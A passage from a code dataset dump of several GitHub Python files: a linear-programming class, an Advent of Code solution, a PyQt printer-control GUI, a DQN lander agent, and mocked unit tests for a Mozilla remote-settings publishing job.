'data/train_poker.csv')\n wget.download(URL_TEST, 'data/test_poker.csv')\n\nif __name__ == '__main__':\n main()\n","repo_name":"progrmanial/Google-AI-Research","sub_path":"tabnet/download_prepare_poker.py","file_name":"download_prepare_poker.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"34370080837","text":"from typing import List\n\nfrom Abstract import equation, lpp\nfrom Abstract.lpp import LPP\nfrom Abstract.equation import Equation\nfrom Abstract.outputHandler import OutputHandler\n\n\nclass SimpleLPP(LPP):\n \"\"\"\n Concrete simple LPP class based on APM236.\n \"\"\"\n objective: Equation\n constraints: List[Equation]\n is_max: bool\n variables: List\n outputter: OutputHandler\n\n def __init__(self, objective, constraints, is_max, outputter):\n var_lst = []\n var_lst += objective.get_vars()\n for const in constraints:\n var_lst += const.get_vars()\n\n variables = set(var_lst)\n\n self.variables = list(variables)\n self.outputter = outputter\n self.is_max = is_max\n\n # TODO: add some sort of testing for the inputs to be in either standard form or canonical form\n self.constraints = constraints\n self.objective = objective\n\n def get_form(self):\n simp, non_simp, valid = self.get_simple_constraints()\n if valid:\n canonical_bool = all([const.get_type() == equation.EQ for const in non_simp])\n standard_bool = all([const.get_type() == equation.LEQ for const in non_simp])\n if canonical_bool:\n return lpp.CANONICAL\n elif standard_bool:\n return lpp.STANDARD\n else:\n return lpp.UNKNOWN\n\n def get_free_variables(self) -> List:\n simples = []\n seen = []\n for const in self.constraints:\n valid_type = (const.get_type() == equation.GEQ) or (const.get_type() == equation.LEQ)\n if const.get_rhs() == 0 and valid_type:\n mask = [None] * (len(self.variables) - 1)\n expected = [0] * (len(self.variables) - 1) + [1]\n for var in self.variables:\n new_mask = mask + [var]\n if const.get_array_form(new_mask) == expected:\n simples.append(const)\n seen.append(var)\n break\n return [x for x in self.variables if x not in seen]\n\n def get_simple_constraints(self):\n simples = []\n not_simples = []\n seen = []\n for const in self.constraints:\n added = False\n valid_type = (const.get_type() == equation.GEQ) or (const.get_type() == equation.LEQ)\n if const.get_rhs() == 0 and valid_type:\n mask = [None] * (len(self.variables) - 1)\n expected = [0] * (len(self.variables) - 1) + [1]\n for var in self.variables:\n new_mask = mask + [var]\n if const.get_array_form(new_mask) == expected:\n simples.append(const)\n seen.append(var)\n added = True\n break\n if not added:\n not_simples.append(const)\n\n return simples, not_simples, all([x in self.variables for x in seen])\n\n def compacted_output(self):\n if self.is_max:\n self.outputter.write(\"Maximize:\")\n else:\n self.outputter.write(\"Minimize:\")\n\n self.outputter.write_eq(self.objective)\n self.outputter.write(\"\\nSubject to:\")\n\n simp, non_simp, result = self.get_simple_constraints()\n for const in non_simp:\n self.outputter.write_eq(const)\n self.outputter.write(\"\\nWhere:\")\n if result:\n varibs = ','.join([str(x) for x in self.variables])\n self.outputter.write(varibs + \" \" + equation.GEQ + \" 0\")\n else:\n for const in simp:\n self.outputter.write_eq(const)\n\n def output(self):\n if self.is_max:\n self.outputter.write(\"Maximize:\\n\")\n else:\n self.outputter.write(\"Minimize:\\n\")\n self.outputter.write_eq(self.objective)\n self.outputter.write(\"\\nSubject to:\")\n for const in self.constraints:\n self.outputter.write_eq(const)\n\n def set_objective(self, new_objective: Equation):\n assert all([var in self.variables for var in new_objective.get_vars()])\n self.objective = new_objective\n\n def get_objective(self):\n return self.objective\n\n def set_constraints(self, constraints: List[Equation]):\n for const in constraints:\n assert all([var in self.variables for var in const.get_vars()])\n self.constraints = constraints\n\n def get_constraints(self):\n return self.constraints\n\n def get_is_max(self):\n return self.is_max\n\n def set_is_max(self, new_max: bool):\n self.is_max = new_max\n\n def get_variables(self):\n return sorted(self.variables, key=lambda x: str(x))\n","repo_name":"VijayS02/LPPy","sub_path":"LPPy/simpleLPP.py","file_name":"simpleLPP.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20087453127","text":"nums = []\nwith open('day9_input.txt') as file:\n line = file.readline().replace('\\n', '')\n\n while line:\n nums.append(int(line))\n line = file.readline().replace('\\n', '')\n#print(len(nums))\nidx = 25\n#print(nums[idx])\nwhile True:\n good = False\n for j in range(0, 25):\n for k in range(0, 25):\n #print(nums[k+idx-25] + nums[j+idx-25])\n if (nums[k+idx-25] + nums[j+idx-25] == nums[idx]):# and (j != idx) and (k != idx):\n good = True\n break\n \n if good:\n idx = idx + 1\n else:\n break\n if 24 + idx >= len(nums): break\nprint(nums[idx])\nkey = nums[idx]\n\n\nidx = 0\nfirst = idx\ntotal = 0\nwhile True:\n total = total + nums[idx + first]\n if total >= key:\n if total == key:\n weakness = min(nums[first:idx + first+1]) + max(nums[first:idx + first+1])\n break\n else:\n first = first + 1\n idx = 0\n total = 0\n else:\n idx = idx + 1\n \n\nprint(weakness)\n","repo_name":"cantudo/aoc","sub_path":"day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17953357768","text":"#!/usr/bin/env python\n'''Shopbot GUI functions for setting up the GUI window'''\n\n# external packages\nfrom PyQt5.QtCore import pyqtSignal, QObject, QThread, QTimer, QThreadPool\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtWidgets import QAction, QApplication, QGridLayout, QMainWindow, QWidget\nimport os, sys\nimport ctypes\nfrom typing import List, Dict, Tuple, Union, Any, TextIO\nimport logging\nimport traceback\nimport csv\nimport datetime\n\n\n# local packages\nfrom general import *\nfrom settings import *\nfrom log import *\nimport fluigent\nimport files\nimport shopbot\nimport cameras\nimport calibration\nimport sbprint\nimport flags\nimport convert\nfrom config import cfg\n\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(currentdir)\nsys.path.append(parentdir)\nfrom sbpRead import SBPHeader\n \n####################### the whole window\n\nclass SBwindow(QMainWindow):\n '''The whole GUI window'''\n \n def __init__(self, parent=None, meta:bool=True, sb:bool=True, flu:bool=True, cam:bool=True, file:bool=True, calib:bool=True, convert:bool=True, uv:bool=True, test:bool=False):\n super(SBwindow, self).__init__(parent)\n \n # initialize all boxes to empty value so if we hit an error during setup and need to disconnect, we aren't trying to call empty variables\n\n self.arduino = flags.arduino(connect=False)\n self.fileBox = files.fileBox(self, connect=False)\n self.sbBox = shopbot.sbBox(self, self.arduino, connect=False) \n self.fluBox = fluigent.fluBox(self, self.arduino, connect=False)\n self.logDialog = None\n self.camBoxes = cameras.camBoxes(self, connect=False)\n self.metaBox = sbprint.metaBox(self, connect=False) \n self.flagBox = flags.flagGrid(self, tall=False)\n self.settingsDialog = QDialog()\n self.save = False\n self.convertDialog = QDialog() \n self.calibDialog = QDialog()\n \n self.meta = meta\n self.sb = sb\n self.uv = uv\n self.flu = flu\n self.cam = cam\n self.test = test\n self.file = file\n self.calib = calib\n self.convert = convert\n\n try:\n self.central_widget = QWidget() \n self.setCentralWidget(self.central_widget) # create a central widget that everything else goes inside\n\n self.setWindowTitle(\"NIST Direct-write printer\")\n self.setStyleSheet('background-color:white;')\n \n# self.resize(1500, 1600) # window size\n self.connect()\n self.createGrid() # create boxes to go in main window\n self.createMenu() # create menu bar to go at top of window\n # createMenu must go after createGrid, because it uses features created in createGrid\n\n logging.info('Window created. GUI is ready.')\n except Exception as e:\n logging.error(f'Error during initialization: {e}')\n traceback.print_exc()\n self.closeEvent(0) # if we fail to initialize the GUI, disconnect from everything we connected\n \n \n def boxes(self) -> List:\n b = []\n\n for s in ['settingsDialog', 'logDialog', 'convertDialog', 'fileBox', 'sbBox', 'fluBox', 'calibDialog', 'metaBox', 'flagBox']:\n if hasattr(self, s):\n b.append(getattr(self, s))\n if hasattr(self, 'camBoxes'):\n b = b+self.camBoxes.list\n return b\n\n \n def connect(self) -> None:\n '''create the boxes. sbBox loads features from fluBox and camBoxes. fileBox loads features from sbBox and camBoxes. '''\n \n if self.uv or self.sb and hasattr(self, 'arduino'):\n print('Connecting Arduino')\n self.arduino.signals.status.connect(self.updateStatus)\n self.arduino.connect()\n \n if self.flu and hasattr(self, 'fluBox'):\n print('Connecting Fluigent box')\n self.fluBox.connect() # fluigent box\n \n if self.cam and hasattr(self, 'camBoxes'):\n print('Connecting camera boxes')\n self.camBoxes.connect() # object that holds camera boxes\n \n if self.sb and hasattr(self, 'sbBox'):\n print('Connecting shopbot box')\n self.sbBox.connect() # shopbot box\n else:\n print('Loading shopbot test layout')\n self.sbBox.testLayout(self.flu)\n\n if self.file and hasattr(self, 'fileBox'):\n print('Connecting file box')\n self.fileBox.connect() # general file ops\n\n if self.meta and hasattr(self, 'metaBox'):\n print('Connecting metadata box')\n self.metaBox.connect() # metadata box\n \n self.flagBox.labelFlags() # relabel flags now that we've connected all the boxes\n \n\n \n def createGrid(self):\n '''Create boxes that go inside of window'''\n\n # use different layout depending on screen resolution\n user32 = ctypes.windll.user32\n width = user32.GetSystemMetrics(0)\n height = user32.GetSystemMetrics(1)\n\n self.fullLayout = QGridLayout()\n self.fullLayout.addWidget(self.sbBox, 0, 0) \n self.fullLayout.addWidget(self.fileBox, 0, 1) # row 0, col 1\n \n if height<2000:\n logging.info('Low screen resolution: using wide window')\n # short window\n self.fullLayout.addWidget(self.fluBox, 0,2)\n self.fluBox.small()\n row = 2\n col = 0\n for camBox in self.camBoxes.list:\n self.fullLayout.addWidget(camBox, row, col)\n col+=1\n if col==3:\n row+=1\n col = 0\n self.move(max(50, int(width-3600)),50)\n else:\n # tall window\n self.fullLayout.addWidget(self.fluBox, 2,0)\n row = 2\n col = 1\n for camBox in self.camBoxes.list:\n self.fullLayout.addWidget(camBox, row, col)\n col+=1\n if col==2:\n row+=1\n col=0\n self.move(max(50, int(width-2800)),50)\n\n self.central_widget.setLayout(self.fullLayout)\n\n \n #----------------\n # log\n \n def setupLog(self, menubar) -> None: \n '''Create the log dialog.'''\n self.logDialog = logDialog(self)\n self.logButt = QAction('Log', self)\n self.logButt.setStatusTip('Open running log of status messages')\n self.logButt.triggered.connect(self.openLog)\n menubar.addAction(self.logButt) # add button to open log window\n \n def openLog(self) -> None:\n '''Open the log window'''\n self.logDialog.show()\n self.logDialog.raise_()\n \n @pyqtSlot(str,bool)\n def updateStatus(self, st:str, log:bool) -> None:\n '''update the displayed device status'''\n if log:\n logging.info(st)\n \n #----------------\n # settings\n \n def setupSettings(self, menubar) -> None: \n '''Create the settings dialog.'''\n self.settingsDialog = settingsDialog(self)\n self.settingsButt = QAction(icon('settings.png'), 'Settings', self)\n self.settingsButt.setStatusTip('Open app settings')\n self.settingsButt.triggered.connect(self.openSettings)\n menubar.addAction(self.settingsButt) # add button to open settings window\n \n def openSettings(self) -> None:\n '''Open the settings window'''\n self.settingsDialog.show()\n self.settingsDialog.raise_()\n \n #-------------- \n # calibration tool\n \n def setupCalib(self, menubar) -> None:\n '''Create the pressure calibration tool dialog'''\n if self.calib:\n self.calibDialog = calibration.pCalibration(self)\n self.calibButt = QAction('Speed calibration tool', self)\n self.calibButt.setStatusTip('Tool for calibrating speed vs pressure')\n self.calibButt.triggered.connect(self.openCalib)\n menubar.addAction(self.calibButt) # add button to open calibration window\n \n def openCalib(self) -> None:\n '''Open the calibration window'''\n self.calibDialog.show()\n self.calibDialog.raise_()\n \n #----------------\n # Convert\n\n def setupConvert(self, menubar) -> None:\n '''Create the convert dialog'''\n if self.convert:\n self.convertDialog = convert.convertDialog(self)\n self.convertButt = QAction('Convert', self)\n self.convertButt.setStatusTip('Convert .gcode file to .sbp')\n self.convertButt.triggered.connect(self.openConvert)\n menubar.addAction(self.convertButt) # add button to open convertion window\n \n def openConvert(self) -> None:\n '''Open the conversion window'''\n self.convertDialog.show()\n self.convertDialog.raise_()\n \n \n #----------------\n # top menu\n \n def createMenu(self):\n '''Create the top menu of the window'''\n menubar = self.menuBar()\n self.setupLog(menubar) # create a log window, not open yet\n self.setupCalib(menubar)\n self.setupConvert(menubar)\n self.setupSettings(menubar) # create a log window, not open yet\n if self.test:\n self.setupDropTest(menubar)\n \n def setupDropTest(self, menubar):\n '''create test menu for dropped frames'''\n self.dropDialog = cameras.dropTestDialog(self)\n self.dropButt = QAction('Dropped frame tool', self)\n self.dropButt.triggered.connect(self.openDropTest)\n menubar.addAction(self.dropButt)\n \n def openDropTest(self) -> None:\n self.dropDialog.show()\n self.dropDialog.raise_()\n \n \n \n\n\n #-----------------\n # file names\n def newFile(self, deviceName:str, ext:str) -> Tuple[str, str]:\n '''Generate a new file name for device and with extension'''\n return self.fileBox.newFile(deviceName, ext)\n \n #----------------\n # metadata at print\n def saveMetaData(self) -> None:\n '''save metadata including print speeds, calibration values, presures, metadata'''\n try:\n fullfn = self.newFile('meta', '.csv')\n except NameError:\n self.updateStatus('Failed to save speed file', True)\n return\n \n \n\n with open(fullfn, mode='w', newline='', encoding='utf-8') as c:\n writer = csv.writer(c, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(['appid', '', cfg.appid])\n for box in self.boxes():\n if hasattr(box, 'writeToTable'):\n box.writeToTable(writer)\n \n self.sbBox.updateStatus(f'Saved {fullfn}', True)\n \n def flagTaken(self, flag0:int) -> bool:\n '''check if the flag is already occupied'''\n if hasattr(self, 'flagBox'):\n return self.flagBox.flagTaken(flag0)\n else:\n return False\n \n #----------------\n \n def getFileName(self) -> str:\n try:\n fullfn = self.newFile('time', '.csv')\n except NameError:\n self.fileName = ''\n return\n self.fileName = fullfn\n \n def initSaveTable(self, channelsTriggered:dict, runSimple:dict) -> None:\n '''initialize a table that saves data during a print'''\n if (hasattr(self, 'fluBox') and self.fluBox.savePressure) or (hasattr(self, 'sbBox') and self.sbBox.savePos):\n self.saveTable = []\n self.save = True\n self.ending = False\n self.getFileName() # determine the current file name\n self.tStart = datetime.datetime.now()\n self.timer = QTimer()\n self.channelsTriggered = channelsTriggered\n self.runSimple = runSimple\n self.timer.timeout.connect(self.readValues)\n self.timer.start(self.sbBox.saveFreq)\n \n \n def readValues(self) -> None:\n '''add values to the table'''\n if self.save:\n dnow = datetime.datetime.now()\n tnow = (dnow-self.tStart).total_seconds()\n if hasattr(self, 'fluBox'):\n plist = self.fluBox.timeRow(self.channelsTriggered)\n else:\n plist = []\n if hasattr(self, 'sbBox'):\n xyzlist = self.sbBox.timeRow(self.runSimple)\n else:\n xyzlist = []\n self.saveTable.append([tnow]+plist+xyzlist)\n \n def discardSaveTable(self) -> None:\n '''throw out the table and stop recording'''\n if hasattr(self, 'timer') and self.timer.isActive():\n self.timer.stop()\n self.ending = False\n self.save = False\n\n def writeSaveTable(self) -> None:\n '''save the table to csv'''\n \n if self.save:\n if hasattr(self, 'timer') and self.timer.isActive():\n self.timer.stop()\n self.ending = False\n self.save = False\n with open(self.fileName, mode='w', newline='', encoding='utf-8') as c:\n writer = csv.writer(c, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n phead = self.fluBox.timeHeader(self.channelsTriggered)\n xyzhead = self.sbBox.timeHeader(self.runSimple)\n writer.writerow(['time(s)']+phead+xyzhead) # header\n for row in self.saveTable:\n writer.writerow(row)\n self.sbBox.updateStatus(f'Saved {self.fileName}', True)\n \n \n \n #----------------\n # close the window\n \n def closeEvent(self, event):\n '''runs when the window is closed. Disconnects everything we connected to.'''\n logging.info('Closing boxes.')\n if hasattr(self, 'timer') and self.timer.isActive():\n self.timer.stop()\n for o in self.boxes():\n if hasattr(o, 'close'):\n o.close()\n else:\n logging.info(f'No close function in {o}')\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n logging.info('Done closing boxes.')\n self.close()\n\n\nclass MainProgram(QWidget):\n '''The main application widget. Here, we can set fonts, icons, window info'''\n \n def __init__(self, meta:bool=True, sb:bool=True, flu:bool=True, cam:bool=True, file:bool=True, calib:bool=True, convert:bool=True, test:bool=False): \n \n app = QApplication(sys.argv)\n sansFont = QFont(\"Arial\", 9)\n app.setFont(sansFont)\n self.sbwin = SBwindow(meta=meta, sb=sb, flu=flu, cam=cam, file=file, test=test, calib=calib, convert=convert)\n\n \n self.sbwin.show()\n self.sbwin.setWindowIcon(icon('sfcicon.ico'))\n app.setWindowIcon(icon('sfcicon.ico'))\n app.exec_()\n \n \n myappid = cfg.appid # arbitrary string\n ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\n \n \n \n\n \n ","repo_name":"usnistgov/ShopbotPyQt","sub_path":"pythonGUI/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":15392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"31012866688","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 25 14:53:22 2022\r\n\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\n\r\n\r\n\r\nclass DQN(nn.Module):\r\n \r\n def __init__(self, learn_rate, inputs, input_size, hidden_size, output_size):\r\n super(DQN, self).__init__() #Inherit all methods from pytorches nn.Module\r\n self.inputs = inputs #set the inputs\r\n self.input_size = input_size #Set the input size\r\n self.hidden_size = hidden_size #set the size of the hiddern layer\r\n self.output_size = output_size #set the output size\r\n \r\n self.input_layer = nn.Linear(*self.inputs, self.input_size) #create the input layer\r\n self.hidden_layer = nn.Linear(self.input_size, self.hidden_size) #create the hidden layer\r\n self.output_layer = nn.Linear(self.hidden_size, self.output_size) #Create the output layer\r\n \r\n self.optimizer = optim.Adam(self.parameters(), lr = learn_rate) #create the optimzier\r\n self.loss = nn.MSELoss()\r\n \r\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu') #Set the device \r\n self.to(self.device) #Make it easy to use device\r\n \r\n \r\n def forward(self, state): #Feedward function\r\n out = F.sigmoid(self.input_layer(state)) #Parse the input into the input layers\r\n out = F.sigmoid(self.hidden_layer(out)) #Take the output from the input layer to feedward prograte through hiddern\r\n out = self.output_layer(out) #Output of hidden layer to parse through the output layer to find output of network\r\n \r\n return out\r\n \r\n \r\n \r\n \r\n \r\n \r\nclass Lander():\r\n \r\n def __init__(self, gamma, epsilon, learn_rate, input_size, batch, output_size, input_layer_size, hidden_layer_size):\r\n \r\n self.memory_size = 10000 #set the size of memory\r\n self.epsiode = 0.01 #Set the \r\n self.epsiode_constant = 5e-4\r\n self.learn_rate = learn_rate #Set the Learning rate\r\n self.actions = [i for i in range(output_size)] #create the actions\r\n self.batch_size = batch #set the batch\r\n self.memory_count = 0 #Set the memory count to 0\r\n \r\n self.gamma = gamma #set the gamma\r\n self.epsilon = epsilon #Set the epsilon to 1.0 as it will decrease\r\n \r\n self.model = DQN(self.learn_rate, input_size, input_layer_size, hidden_layer_size, output_size) #Add the model\r\n \r\n self.memory = np.zeros((self.memory_size, *input_size), dtype=np.float32) #Create the memory for the DQN Agent was made from Machine Learning with Phill (2020).\r\n self.input_state_memory = np.zeros((self.memory_size, *input_size), dtype=np.float32) \r\n \r\n self.action_memory = np.zeros(self.memory_size, dtype=np.int32)\r\n self.reward_memory = np.zeros(self.memory_size, dtype=np.float32)\r\n self.terminal_memory = np.zeros(self.memory_size, dtype=np.bool)\r\n \r\n \r\n def transition(self, state, action, reward, new_state, done):\r\n \r\n index = self.memory_count % self.memory_size #This memeory function is from Machine Learning with Phill (2020). \r\n self.memory[index] = state\r\n self.input_state_memory[index] = new_state\r\n self.reward_memory[index] = reward\r\n self.action_memory[index] = action\r\n self.terminal_memory[index] = done\r\n \r\n self.memory_count = self.memory_count + 1\r\n \r\n def decision(self, new_state):\r\n \r\n if np.random.random() > self.epsilon: #This memeory function is from Machine Learning with Phill (2020). \r\n state = torch.tensor([new_state]).to(self.model.device)\r\n actions = self.model.forward(state)\r\n action = torch.argmax(actions).item()\r\n else:\r\n action = np.random.choice(self.actions)\r\n \r\n return action\r\n \r\n def preprocess(self):\r\n self.max_mem = min(self.memory_count, self.memory_size) #This memeory function is from Machine Learning with Phill (2020). \r\n self.batch = np.random.choice(self.max_mem, self.batch_size, replace=False)\r\n \r\n self.state_batch = torch.tensor(self.memory[self.batch]).to(self.model.device)\r\n self.new_state_batch = torch.tensor(self.input_state_memory[self.batch]).to(self.model.device)\r\n self.reward_batch = torch.tensor(self.reward_memory[self.batch]).to(self.model.device)\r\n self.terminal_batch = torch.tensor(self.terminal_memory[self.batch]).to(self.model.device)\r\n \r\n self.action_batch = self.action_memory[self.batch]\r\n \r\n \r\n \r\n def find_Q(self):\r\n self.batch_index = np.arange(self.batch_size, dtype=np.int32) #This memeory function is from Machine Learning with Phill (2020). \r\n model = self.model.forward(self.state_batch)[self.batch_index, self.action_batch]\r\n q_next = self.model.forward(self.new_state_batch)\r\n q_next[self.terminal_batch] = 0.0\r\n q_target = self.reward_batch + self.gamma * torch.max(q_next, dim=1)[0]\r\n\r\n return q_target, model\r\n \r\n \r\n def learn(self):\r\n \r\n if self.memory_count < self.batch_size: #If memory count is less then the batch size return\r\n return \r\n \r\n self.model.optimizer.zero_grad() #Optimizer the model\r\n \r\n self.preprocess() #preprocess the data and store the data for the DQN\r\n \r\n q_target, model = self.find_Q() #Apply the policys on the Model\r\n \r\n loss = self.model.loss(q_target, model).to(self.model.device) #Find the loss\r\n loss.backward() #change the weights depending on the output of the model\r\n self.model.optimizer.step() #Apply ADAM optimizer\r\n \r\n self.epsilon = self.epsilon - self.epsiode_constant if self.epsilon > self.epsiode \\\r\n else self.epsiode # This line is from Machine Learning with Phill (2020). \r\n \r\n \r\n \r\n \r\n\"\"\"\r\nMachine Learning with Phill (2020). \r\nDeep Q Learning is Simple with PyTorch | Full Tutorial 2020. [online] Available at: https://www.youtube.com/watch?v=wc-FxNENg9U&t=1403s [Accessed 1 Apr. 2022] \r\n\"\"\" \r\n \r\n \r\n \r\n","repo_name":"sliverpool555/LandingRocketOpenAI","sub_path":"LanderV4.py","file_name":"LanderV4.py","file_ext":"py","file_size_in_byte":6855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3987399631","text":"import os\nimport tempfile\nimport unittest\nfrom unittest import mock\n\nimport requests\nimport responses\nfrom kinto_http import Client\n\nfrom commands.publish_dafsa import (\n BUCKET_ID,\n BUCKET_ID_PREVIEW,\n COLLECTION_ID,\n COMMIT_HASH_URL,\n LIST_URL,\n MAKE_DAFSA_PY,\n PREPARE_TLDS_PY,\n RECORD_ID,\n download_resources,\n get_latest_hash,\n get_stored_hash,\n prepare_dafsa,\n publish_dafsa,\n remote_settings_publish,\n)\n\n\nclass TestsGetLatestHash(unittest.TestCase):\n @responses.activate\n def test_get_latest_hash_returns_sha1_hash(self):\n responses.add(responses.GET, COMMIT_HASH_URL, json=[{\"sha\": \"hash\"}])\n latest_hash = get_latest_hash(COMMIT_HASH_URL)\n self.assertEqual(latest_hash, \"hash\")\n\n @responses.activate\n def test_HTTPError_raised_when_404(self):\n responses.add(\n responses.GET, COMMIT_HASH_URL, json={\"error\": \"not found\"}, status=404\n )\n with self.assertRaises(requests.exceptions.HTTPError) as e:\n get_latest_hash(COMMIT_HASH_URL)\n self.assertEqual(e.status_code, 404)\n\n\nclass TestDownloadResources(unittest.TestCase):\n def test_all_files_downloaded_with_correct_names(self):\n with tempfile.TemporaryDirectory() as tmp:\n download_resources(tmp, PREPARE_TLDS_PY, MAKE_DAFSA_PY, LIST_URL)\n self.assertEqual(\n sorted(os.listdir(tmp)),\n sorted([\"public_suffix_list.dat\", \"prepare_tlds.py\", \"make_dafsa.py\"]),\n )\n\n @responses.activate\n def test_HTTPError_raised_when_404(self):\n with tempfile.TemporaryDirectory() as tmp:\n responses.add(\n responses.GET, PREPARE_TLDS_PY, json={\"error\": \"not found\"}, status=404\n )\n with self.assertRaises(requests.exceptions.HTTPError) as e:\n download_resources(tmp, PREPARE_TLDS_PY)\n self.assertEqual(e.status_code, 404)\n\n\nclass TestGetStoredHash(unittest.TestCase):\n def setUp(self):\n server = \"https://fake-server.net/v1\"\n auth = (\"arpit73\", \"pAsSwErD\")\n self.client = Client(\n server_url=server, auth=auth, bucket=BUCKET_ID, collection=COLLECTION_ID\n )\n self.record_uri = server + self.client.get_endpoint(\n \"record\", id=RECORD_ID, bucket=BUCKET_ID, collection=COLLECTION_ID\n )\n\n @responses.activate\n def test_stored_hash_fetched_successfully(self):\n responses.add(\n responses.GET,\n self.record_uri,\n json={\"data\": {\"commit-hash\": \"fake-commit-hash\"}},\n )\n stored_hash = get_stored_hash(self.client)\n self.assertEqual(stored_hash, \"fake-commit-hash\")\n\n @responses.activate\n def test_returns_none_when_no_record_found(self):\n responses.add(\n responses.GET, self.record_uri, json={\"error\": \"not found\"}, status=404\n )\n self.assertIsNone(get_stored_hash(self.client))\n\n\nclass TestPrepareDafsa(unittest.TestCase):\n def test_file_is_created_in_output_folder(self):\n with tempfile.TemporaryDirectory() as tmp:\n output_binary_path = prepare_dafsa(tmp)\n self.assertIn(os.path.basename(output_binary_path), os.listdir(tmp))\n self.assertGreater(os.path.getsize(output_binary_path), 0)\n\n def test_exception_is_raised_when_process_returns_non_zero(self):\n with tempfile.TemporaryDirectory() as tmp:\n with mock.patch(\"subprocess.Popen\") as mocked:\n mocked.return_value.returncode = 1\n with self.assertRaises(Exception) as e:\n prepare_dafsa(tmp)\n self.assertIn(\"DAFSA Build Failed\", str(e.exception))\n\n\nclass TestRemoteSettingsPublish(unittest.TestCase):\n def setUp(self):\n server = \"https://fake-server.net/v1\"\n auth = (\"arpit73\", \"pAsSwErD\")\n self.client = Client(\n server_url=server, auth=auth, bucket=BUCKET_ID, collection=COLLECTION_ID\n )\n record_uri = server + self.client.get_endpoint(\n \"record\", id=RECORD_ID, bucket=BUCKET_ID, collection=COLLECTION_ID\n )\n self.collection_uri = server + self.client.get_endpoint(\n \"collection\", bucket=BUCKET_ID, collection=COLLECTION_ID\n )\n self.attachment_uri = f\"{record_uri}/attachment\"\n\n @responses.activate\n def test_record_was_posted(self):\n responses.add(\n responses.POST,\n self.attachment_uri,\n json={\"data\": {\"commit-hash\": \"fake-commit-hash\"}},\n )\n responses.add(\n responses.PATCH, self.collection_uri, json={\"data\": {\"status\": \"to-review\"}}\n )\n\n with tempfile.TemporaryDirectory() as tmp:\n dafsa_filename = f\"{tmp}/dafsa.bin\"\n with open(dafsa_filename, \"wb\") as f:\n f.write(b\"some binary data\")\n remote_settings_publish(self.client, \"fake-commit-hash\", dafsa_filename)\n\n self.assertEqual(len(responses.calls), 2)\n\n self.assertEqual(responses.calls[0].request.url, self.attachment_uri)\n self.assertEqual(responses.calls[0].request.method, \"POST\")\n\n self.assertEqual(responses.calls[1].request.url, self.collection_uri)\n self.assertEqual(responses.calls[1].request.method, \"PATCH\")\n\n\nclass TestPublishDafsa(unittest.TestCase):\n def setUp(self):\n self.event = {\n \"server\": \"https://fake-server.net/v1\",\n \"auth\": \"arpit73:pAsSwErD\",\n }\n client = Client(\n server_url=self.event.get(\"server\"),\n auth=(\"arpit73\", \"pAsSwErD\"),\n bucket=BUCKET_ID,\n collection=COLLECTION_ID,\n )\n self.record_uri = self.event.get(\"server\") + client.get_endpoint(\n \"record\", id=RECORD_ID, bucket=BUCKET_ID, collection=COLLECTION_ID\n )\n self.record_uri_preview = self.event.get(\"server\") + client.get_endpoint(\n \"record\", id=RECORD_ID, bucket=BUCKET_ID_PREVIEW, collection=COLLECTION_ID\n )\n\n mocked = mock.patch(\"commands.publish_dafsa.prepare_dafsa\")\n self.addCleanup(mocked.stop)\n self.mocked_prepare = mocked.start()\n\n mocked = mock.patch(\"commands.publish_dafsa.remote_settings_publish\")\n self.addCleanup(mocked.stop)\n self.mocked_publish = mocked.start()\n\n @responses.activate\n def test_prepare_and_publish_are_not_called_when_hashes_matches(self):\n responses.add(\n responses.GET, COMMIT_HASH_URL, json=[{\"sha\": \"fake-commit-hash\"}]\n )\n responses.add(\n responses.GET,\n self.record_uri,\n json={\"data\": {\"commit-hash\": \"fake-commit-hash\"}},\n )\n\n publish_dafsa(self.event, context=None)\n\n self.assertFalse(self.mocked_prepare.called)\n self.assertFalse(self.mocked_publish.called)\n\n @responses.activate\n def test_prepare_and_publish_not_called_when_pending_review(self):\n responses.add(\n responses.GET, COMMIT_HASH_URL, json=[{\"sha\": \"fake-commit-hash\"}]\n )\n responses.add(\n responses.GET,\n self.record_uri,\n json={\"data\": {\"commit-hash\": \"different-fake-commit-hash\"}},\n )\n responses.add(\n responses.GET,\n self.record_uri_preview,\n json={\"data\": {\"commit-hash\": \"fake-commit-hash\"}},\n )\n\n publish_dafsa(self.event, context=None)\n\n self.assertFalse(self.mocked_prepare.called)\n self.assertFalse(self.mocked_publish.called)\n\n @responses.activate\n def test_prepare_and_publish_are_called_when_hashes_do_not_match(self):\n responses.add(\n responses.GET, COMMIT_HASH_URL, json=[{\"sha\": \"fake-commit-hash\"}]\n )\n responses.add(\n responses.GET,\n self.record_uri,\n json={\"data\": {\"commit-hash\": \"different-fake-commit-hash\"}},\n )\n responses.add(\n responses.GET,\n self.record_uri_preview,\n json={\"data\": {\"commit-hash\": \"different-fake-commit-hash\"}},\n )\n\n publish_dafsa(self.event, context=None)\n\n self.assertTrue(self.mocked_prepare.called)\n self.assertTrue(self.mocked_publish.called)\n","repo_name":"mozilla-services/remote-settings-lambdas","sub_path":"tests/test_publish_dafsa.py","file_name":"test_publish_dafsa.py","file_ext":"py","file_size_in_byte":8293,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"22620693384","text":"from tarfile import DEFAULT_FORMAT\r\nimport pygame\r\nimport 